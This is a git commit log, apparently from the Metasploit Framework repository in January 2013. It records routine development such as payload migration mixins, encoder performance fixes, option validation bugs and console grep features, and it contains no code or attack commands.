James Lee c37510f777 Move prependmigrate.rb for naming consistency 2013-01-22 14:15:52 -06:00
James Lee 04adaf0e9d Unstupid the prepends callback
Windows#prepends was overriding PrependMigrate#prepends
2013-01-22 13:56:26 -06:00
James Lee 32aa2c6d9c Make asm spacing easier to read
Also adds a #prepends callback to Payload::Windows to make it a little
clearer what's happening.
2013-01-22 13:25:27 -06:00
Tasos Laskos fed4a836c6 Updated proof string for Web Differential Analysis
Manipulatable responses => Boolean manipulation
2013-01-22 20:29:57 +02:00
Royce Davis 81625121f2 Cleaned up some code spacing 2013-01-22 09:49:03 -06:00
Raphael Mudge 4740cb09a1 Fix NoMethodError if handler has no ParentModule
db.rb assumes that multi/handler sessions have a ParentModule defined
in their datastore. This assumption breaks when a user sets up a
multi/handler by hand to receive a session from another user (e.g.,
via multi_meter_inject).

When db.rb tries to access a member of a nil ParentModule, a
stacktrace is dumped to framework.log.
2013-01-22 02:56:43 -05:00
kernelsmith 52596ae3b4 add -R capability like hosts -R
moves the set_rhosts method def out into a separate file so it can be
included by both db.rb cmd_hosts and core.rb cmd_grep
2013-01-21 18:17:28 -06:00
jvazquez-r7 b2c7223108 Cleanup for mysql_file_enum.rb 2013-01-21 12:26:35 +01:00
kernelsmith f05e358058 replace unless rhosts.include? with rhosts.uniq!
seems like this will speed up the process due to far less Array lookups
2013-01-21 00:46:05 -06:00
Robin Wood 23d1eb7a80 File/dir brute forcer using MySQL 2013-01-20 21:23:58 +00:00
scriptjunkie 66d5f39057 Ensure prepend_migrate? always functions correctly. 2013-01-18 18:04:09 -06:00
scriptjunkie 6c046dfa69 Move PrependMigrate to a mixin 2013-01-18 17:45:36 -06:00
scriptjunkie 07bf36f62f Ensure shell still works if PrependMigrateProc fails to launch.
Don't rely on GetStartupInfoA return value.
2013-01-18 17:32:50 -06:00
scriptjunkie 52251867d8 Ensure Windows single payloads use payload backend
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
scriptjunkie 16d065adfc Fix issue with singles.
Single now plays more nicely with other mixins, so PrependMigrate works.
2013-01-18 16:34:39 -06:00
scriptjunkie b01374904b tidy EOL spaces 2013-01-18 16:34:39 -06:00
scriptjunkie 15268cae73 Add X64 PrependMigrate support 2013-01-18 16:34:39 -06:00
scriptjunkie c97be836c3 Fix error calculating payload sizes.
Error meant most Windows payloads were marked as incompatible with many exploits.
2013-01-18 16:34:39 -06:00
scriptjunkie 725d4d7194 Re-use block_api code in migrate stub if possible
Makes payload significantly smaller.
2013-01-18 16:34:38 -06:00
scriptjunkie 0b32111a9f Revert "Revert "Merge branch 'migrator' of git://github.com/scriptjunkie/metasploit-framework into scriptjunkie-migrator""
This reverts commit 2436ac3a58.
2013-01-18 16:34:38 -06:00
Royce Davis a2f66a8fef Fixed msftidy complaints 2013-01-18 09:33:44 -06:00
Royce Davis 00a9c72595 Fixed exception handeling. No longer using rescure StandardError 2013-01-17 19:02:13 -06:00
kernelsmith 6e8e7a407d adds a .nil? check as well 2013-01-17 00:30:58 -06:00
kernelsmith 7090a4a82f adds check for empty data b4 sending to parser [RM7269]
[fixes RM7269]
we discussed the solution to this bug a lot on IRC and in the ticket
itself, the consensus was to fix it as far upstream as possible before
sending to the parsers so as to avoid any future bugs of the same
nature, so this commit adds a check to import_nmap_xml to see if the
data is empty before passing it on to the parser, whether that parser
is nokogiri or the legacy parser.
db_nmap -h now produces the expected output and db_nmap still works as
expected.
2013-01-17 00:18:13 -06:00
Royce Davis f7571d89de Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper 2013-01-16 09:56:27 -06:00
kernelsmith b1dbbe3baa msftidy eol fixes 2013-01-16 00:59:45 -06:00
kernelsmith f7195fb5b5 handle unknown commands more informatively
before it just returned nothing, now it prints the familiar "Unkown
command: " message
2013-01-16 00:39:22 -06:00
sinn3r c621e83ffe Merge branch 'feature/stage_encoding' of github.com:jlee-r7/metasploit-framework into jlee-r7-feature/stage_encoding 2013-01-15 23:31:40 -06:00
kernelsmith 204b43b0d3 fix typo in args.shift 2013-01-15 22:44:55 -06:00
kernelsmith 2a6a833931 prompt fixes (restores prompt context) & normalization
Msf::Ui::Console::Driver::DefaultPrompt and
Msf::Ui::Console::Driver::Default should be used when default is desired
2013-01-15 22:24:36 -06:00
kernelsmith ad8516eacf fixed prompt issue, still need to restore context
see line 2519 area.
msf  exploit(psexec) > grep -i -A 2 encoding show
<snip>
msf>
2013-01-15 17:57:28 -06:00
kernelsmith 4d33742482 fixed bug with -A 2013-01-15 17:35:57 -06:00
kernelsmith 86e4bb2db5 yard doc fixed and added for all _tabs methods 2013-01-15 16:42:02 -06:00
Royce Davis 6773a10632 Made changes to cleanup to use file_dropper instead 2013-01-15 16:24:16 -06:00
kernelsmith c60556389f add yard doc and allow for -A and -B at same time 2013-01-15 16:22:04 -06:00
James Lee 26b40666ce Merge branch 'rapid7' into feature/stage_encoding 2013-01-15 15:10:58 -06:00
Royce Davis 7361e1041f Merge commit '5e8f388ab8425bf2ef4c2fe33e6133b99ceb46d4' into psexec-mixin2 2013-01-15 14:49:21 -06:00
Royce Davis 6f17ed96db Merge https://github.com/rapid7/metasploit-framework into psexec-mixin2 2013-01-15 14:48:20 -06:00
James Lee af2b1ec25b Clean up doc comments 2013-01-15 14:22:11 -06:00
James Lee ee14c1c613 Merge remote-tracking branch 'R3dy/psexec-mixin2' into rapid7 2013-01-15 12:58:50 -06:00
James Lee 4883cf4b01 Minor doc comment additions 2013-01-15 12:49:43 -06:00
James Lee d36e38fca6 Move encoding into handle_connection
* Allows payloads that override generate_stage to still take advantage
  of stage encoding
* Also adds doc comments for a few methods
2013-01-15 10:34:31 -06:00
Tod Beardsley 6064dfcb71 Merge remote-tracking branch 'wchen-r7/fail_to_reload_fix' 2013-01-15 01:43:07 -08:00
kernelsmith 9ad726167e changes to address scriptjunkie's rpc concerns
as described in https://github.com/rapid7/metasploit-framework/pull/820
2013-01-14 17:14:48 -06:00
James Lee a1e853500f Merge branch 'bug/optint_empty' into feature/stage_encoding 2013-01-14 15:50:39 -06:00
James Lee 21c18b78e6 Don't bother nil check, to_s handles it 2013-01-14 15:47:58 -06:00
James Lee 0c90171fa7 Deal with alread-normalized ints
[See #1308][See #1304]
2013-01-14 15:31:14 -06:00
James Lee fb19ec1005 Merge branch 'rapid7' into feature/stage_encoding 2013-01-14 15:20:23 -06:00
sinn3r b2ecb18a71 Allow OptInt to pass "" for special reasons
Cheap fix
2013-01-14 14:55:48 -06:00
kernelsmith 9bb2dddf99 adds @todo for when tab_comp norm is completed
tab_completion normalization is RM7649
2013-01-14 14:53:31 -06:00
sinn3r 07d15baf89 Merge branch 'bug/opt_int_hex' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/opt_int_hex 2013-01-14 14:40:25 -06:00
James Lee bbb3fa25be Allow negative values for OptInt
[FixRM #7540]
2013-01-14 14:18:56 -06:00
kernelsmith 7ca9a216f4 Merge remote-tracking branch 'upstream/master' into msfconsole-grep 2013-01-14 14:15:32 -06:00
kernelsmith 3c44769bd8 attempt to add nested tab completion 2013-01-14 14:15:13 -06:00
James Lee b3b68c1b90 Make stage encoding possible
* Fixes a bug in shikata where input greater than 0xffff length would
  still use 16-bit counter
* Short circuits finding bad xor keys if there are no bad characters to
  avoid
* Fixes huge performance issue with large inputs to xor-based encoders
  due to the use of String#+ instead of String#<< in a loop. It now
  takes ~3 seconds on modern hardware to encode a 750kB buffer with
  shikata where it used to take more than 10 minutes. The decoding side
  takes a similar amount of time and will increase the wait between
  sending the second stage and opening a usable session by several
  seconds.

I believe this addresses the intent of pull request 905

[See #905]
2013-01-13 21:07:39 -06:00
James Lee 0d34e0b249 Fix regex for hex numbers 2013-01-13 20:53:40 -06:00
kernelsmith 7f90082bec grep tab complete is working, but not fully
options tab complete, but not the commands at the end
2013-01-13 03:06:56 -06:00
kernelsmith d9990829d9 fixes some issues with -k and -s 2013-01-13 02:39:56 -06:00
kernelsmith 1646fc8faa Merge remote-tracking branch 'upstream/master' into msfconsole-grep 2013-01-13 02:18:54 -06:00
kernelsmith e7372250d2 added -k keep and -s skip 2013-01-13 02:18:45 -06:00
Spencer McIntyre b178ce1895 allow the mixin to auto detect an available decoder binary 2013-01-12 17:31:11 -05:00
James Lee 4703a6f737 Unbreak OptInt hex syntax
* Fix spec for no-longer-pending tests
* Fix regex in OptInt#valid? to allow hex syntax again

[See #1293][See #1296]
2013-01-12 14:17:29 -06:00
sinn3r b388f2357c Reset modules_cached flag when database disconnects 2013-01-12 00:08:30 -06:00
HD Moore 06fb8f5443 Merge pull request #1293 from wchen-r7/optint_valid
Fix OptInt's valid?() function
2013-01-11 17:29:27 -08:00
sinn3r 8c04df4a47 [FixRM: #7535] Missing normalize() in OptPort
[FixRM: #7535] - Sometimes OptPort can return as a String instead
of Fixnum because OptPort is missing the normalize() function.
2013-01-11 18:34:27 -06:00
sinn3r 0347b173eb Fix OptInt's valid?() function
[FixRM #7539] - The valid?() function will first normalize() the
user-supplied input before validation.  The problem is that the
normalize() function will ALWAYS convert data to integer, therefore
whatever you validate, you will always get true.  For example:
when I do "yomama".to_i, that returns 0, and of course will pass
integer validation.
2013-01-11 16:27:33 -06:00
Spencer McIntyre ce4aa606e7 change DECODER OptString to OptEnum per egypt's recommendation 2013-01-11 14:34:23 -05:00
sinn3r aa36b65aee [FixRM #7673] "Failed to reload" error.
When db_disconnect is issued, this funtion does not update the status
of self.migrated to false.  So when another reload command is used,
the update_module_details function will still try to connect to the
database, which causes the "Failed to reload" error.
2013-01-11 01:10:56 -06:00
Royce Davis b702263bbf Added fix form Eric Milam to simple.disconnect 2013-01-10 16:33:03 -06:00
James Lee 7fd3440c1a Fix hd's attempt to rename ruby payloads 2013-01-10 15:25:50 -06:00
James Lee 4fcb8b6f8d Revert "Rename again to be consistent with payload naming"
This reverts commit 0fa2fcd811.
2013-01-10 15:24:25 -06:00
Tod Beardsley 6a10857daf Merge remote-tracking branch 'bturner-r7/set_gem_path' 2013-01-10 12:55:55 -08:00
HD Moore 0fa2fcd811 Rename again to be consistent with payload naming 2013-01-10 14:16:37 -06:00
HD Moore 88b08087bf Renamed and made more robust 2013-01-10 14:05:29 -06:00
Spencer McIntyre 4c87b1ba36 escape ticks and spaces in paths 2013-01-10 09:15:24 -05:00
HD Moore 4c1e501ed0 Exploit for CVE-2013-0156 and new ruby-platform modules 2013-01-09 23:10:13 -06:00
Tod Beardsley 950902f856 Add a tasteful URL to some banners. 2013-01-09 22:33:30 -06:00
Tod Beardsley 6f26e9efb2 More banner sanity checking. 2013-01-09 22:32:53 -06:00
Royce Davis 13140d05b1 Added some methods for checkout output and cleanup 2013-01-09 21:14:19 -06:00
Tod Beardsley 12f0501f2f Add a little erorr checking, another cow 2013-01-09 20:38:14 -06:00
Tod Beardsley a0ba2f4951 Seperate data from code
Banners are content more than anything.
2013-01-09 19:54:08 -06:00
sinn3r a158611c95 Merge branch 'tasos-r7-web-modules' 2013-01-09 16:14:16 -06:00
sinn3r 8b25599feb Merge branch 'web-modules' of github.com:tasos-r7/metasploit-framework into tasos-r7-web-modules 2013-01-09 16:14:04 -06:00
jvazquez-r7 7a1a9985d5 Merge branch 'mysql_login_exceptions' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-mysql_login_exceptions 2013-01-09 18:21:03 +01:00
sinn3r 6490af720b Make failures more verbose so people know what's going on 2013-01-09 11:11:26 -06:00
Tasos Laskos 5ac6060fc1 Auxiliary::Web::HTTP_request: Updated to return an empty response on reset connections 2013-01-09 19:06:51 +02:00
Tasos Laskos 74cdd918af Auxiliary::Web::HTTP#run: don't allow connection or callback errors to abort the whole operation 2013-01-09 18:38:09 +02:00
Spencer McIntyre d79a3c8e6b list valid DECODER values and add the sshexec module 2013-01-09 10:27:22 -05:00
Royce Davis c262288541 Fixed msftidy issues 2013-01-08 15:35:20 -06:00
Royce Davis 3e1ea25207 Added Yard documentation 2013-01-08 15:20:13 -06:00
James Lee 95a95d45ec Fix importing msfxml files containing a session
[See #1179][SeeRM #7669]
2013-01-08 12:13:20 -06:00
Royce Davis c236e4e6e3 I took a stab at generating Yard documentation. I have never done it before... 2013-01-08 11:57:59 -06:00
Royce Davis 4fd196c0de Fixed typo, capitalization and column space 2013-01-08 11:52:40 -06:00
sinn3r 824bd84990 I forgot to add this exception 2013-01-07 18:06:39 -06:00
sinn3r fc48cc117d Merge branch 'bug/rm7665-netsparker-import' of github.com:jlee-r7/metasploit-framework into jlee-r7-bug/rm7665-netsparker-import 2013-01-07 17:19:52 -06:00